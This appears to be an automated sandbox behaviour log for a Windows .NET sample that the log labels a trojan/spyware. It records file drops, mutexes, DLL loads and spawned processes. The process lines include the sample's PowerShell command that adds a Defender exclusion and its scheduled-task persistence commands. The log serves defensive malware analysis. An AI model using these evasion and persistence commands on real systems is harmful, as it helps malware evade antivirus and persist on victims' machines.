              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: _0020.AddAccessRule
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@33/21@0/1
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | File created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Mutant created: \Sessions\1\BaseNamedObjects\bNBVxUdiYnNCEgLdWmNnJcvXv
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Mutant created: \Sessions\1\BaseNamedObjects\w8DsMRIhXrOmk0Gn
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3264:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6912
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | File created: C:\Users\user\AppData\Local\Temp\tmpAD87.tmp
Source: 9758xBqgE1azKnB.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 9758xBqgE1azKnB.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 9758xBqgE1azKnB.exe | ReversingLabs: Detection: 57%
Source: 9758xBqgE1azKnB.exe | Virustotal: Detection: 54%
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | File read: C:\Users\user\Desktop\9758xBqgE1azKnB.exe
Source: unknown | Process created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Process created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Process created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpE11A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmp21F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 1852
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp"
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Process created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Process created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpE11A.tmp"
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmp21F.tmp"
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: appresolver.dll
